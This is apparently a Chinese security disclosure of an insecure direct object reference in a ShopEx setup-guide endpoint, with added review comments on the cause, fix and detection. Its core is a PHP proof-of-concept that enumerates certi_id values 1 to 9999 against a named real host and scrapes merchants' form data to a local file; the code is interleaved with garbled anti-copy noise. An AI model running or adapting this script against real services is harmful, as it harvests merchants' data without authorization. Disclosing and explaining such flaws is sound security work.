简要描述:
ShopEx 某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。这说明服务端仅凭客户端提交的 certi_id 返回对应商户的数据,而没有校验请求者是否有权访问该 certi_id,属于越权访问(IDOR)问题。

<?php
// NOTE(review): proof-of-concept exactly as posted in the disclosure above;
// the forum's anti-copy watermark noise is interleaved with the code and is
// left untouched here.
//
// What the script demonstrates: the guide endpoint selects the merchant
// record solely from the client-supplied `certi_id` carried inside the
// base64-encoded `refer` query parameter, so stepping through that number
// returns other merchants' pre-filled form fields -- an insecure direct
// object reference (IDOR). Base64 is an encoding, not a secret.
//
// Server-side fix: bind the merchant identity to an authenticated session
// or a server-signed token and reject any `certi_id` the caller does not
// own; changing how `refer` is encoded does not close the hole.
// Detection: one client issuing many requests in a short window whose
// decoded `refer` carries sequential `certi_id` values.
|2 i& J; m Q, h: E
// Driver: calls the fetch routine once for each certi_id in 1..9999.
- @7 q! ~3 B0 k1 [ for ($i=1; $i < 10000; $i++) { //enumerate6 q3 z* d, [% R3 x, u( F2 o
! M" m' A; @* e" } ShowshopExD($i);' e& k, U; o2 u/ n8 `+ w
. P4 a! F5 K$ t }# j4 _3 a, w. W- L h
U1 y+ R: \3 [% {: }" m, Z Y
/**
 * Fetches the guide page for one certi_id and records the text-input
 * name/value pairs found in the response.
 *
 * @param int|string $cid candidate certi_id; coerced with intval() below
 * @return void  pairs are echoed to stdout and appended to c:/shopEx.txt
 */
function ShowshopExD($cid) {. |- \' o& I) M
3 }8 f7 E3 y0 \3 e5 f5 b' L8 v$ e $url='http://guide.ecos.shopex.cn/step2.php';, i; U n, }) u
! ~* Q+ j' u7 \2 s3 h8 Q
// The only per-request variation is certi_id; callback_url is a fixed dummy.
// Per the disclosure, the server does not check that the caller owns this id.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
Y7 \8 |4 A2 p) n% y2 b, {/ Y* t9 q: q) V, D: @5 B
$url = $url.'?refer='.$refer;
- i3 V$ Y5 s( D% u4 ]8 `7 N3 Z% b- L7 N* |4 S2 s
$ch = curl_init($url);
+ Y6 U- b- i% @- R6 p4 j7 l5 |. C+ r9 j0 R- d0 m" t
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;5 H9 n, }3 I8 V. o% z
" _' }) t( {, y1 Q2 A
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;: }: p8 W1 r8 h
// curl_exec() returns false on a transport failure; that case is not checked.
4 a/ s- e) a$ W) Y7 U; Z $result = curl_exec($ch);
5 @) I. I# T7 \ w. U8 |% Y* `5 l1 O
// Re-encodes the body UTF-8 -> GB2312, presumably for a GBK console on the
// Windows host implied by the c:/ path below -- confirm before relying on it.
6 J# ?, C" s, E1 I9 f $result = mb_convert_encoding($result, "gb2312", "UTF-8");
2 J' L# K. Z/ K" q) s1 U+ W
// A response that echoes the refer token back is treated as a hit.
// NOTE: strpos() returning 0 (match at offset 0) would read as "no match".
4 K8 \; {2 F4 d. t0 d- ~. {% N if(strpos($result,$refer))
) R, r/ ^% G) D
& W3 h' j# f. T# U/ Y% ~ {
8 `$ F1 o' b9 v7 q; h7 M; J. c
# d! L3 t4 h/ ^) Q, [ $fp = fopen("c:/shopEx.txt",'ab'); //save to file0 c) a" l8 r5 g9 d) n) A6 B
3 e1 }% W: c) V; A; `
// Pulls every <input type="text" .../> tag, then its name and value attributes.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);; z, X# \# r; V# P8 q" Z+ ^$ G
2 e2 L/ F. n! r foreach ($value[1] as $key) {( {1 Q- @$ Z. ^2 n9 a- K4 G
" O; p4 F- j ?8 S. } preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
/ U$ P8 f! ?1 o6 k( G6 a. p6 Z7 U: c3 V0 E& G: |3 ?% p7 m% q( A6 a
echo $res[1][0].':'.$res[3][0]."\r\n";( v2 Y0 T6 s1 f# J
. J# _9 `# a, R% [9 k6 t! @; ~ $col =$res[1][0].':'.$res[3][0]."\r\n";
6 a# S$ J/ W9 o }* q' s6 N% K
// Runs after the foreach closes, so only the last name:value pair reaches the file.
8 e- ]) c) c6 Y) Y2 y fwrite($fp, $col, strlen($col)); . @- e7 Y8 [( ]+ L- N f
2 k& l- L6 ~- ^; o }
8 {0 G d- @0 _6 t6 z& J, S9 n% t3 ]* \0 {! `' \. ~/ Z
echo '--------------------------------'."\r\n";
3 d4 h$ i: R, d
( D/ j/ {* w% i8 p; f# E fclose($fp); ) z- ] v# G3 ~5 h& j- \$ q
& ?+ V- U0 o& R }
0 N( e6 w& d4 Z1 Q: b. Y" Z4 ^! V1 m! L
flush();
7 Z' Y% A9 Z' R. D$ Z3 ^8 R' u, T. D; H c: J: z9 m
curl_close($ch);1 h% X# i6 x( @% h! y
. Q. K2 ^0 J* `9 ]8 X
}
8 [+ Y, n# J7 G# {2 m: ~9 L* f" |! C4 k1 p; R; P
?>) O) U. [0 s0 N' O7 @
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式。需要说明的是,仅更换 refer 的编码或加密方式并不能解决问题:漏洞的根源在于服务端未校验请求者对该 certi_id 的访问权限,应在服务端将 certi_id 与已认证的会话绑定并做归属校验。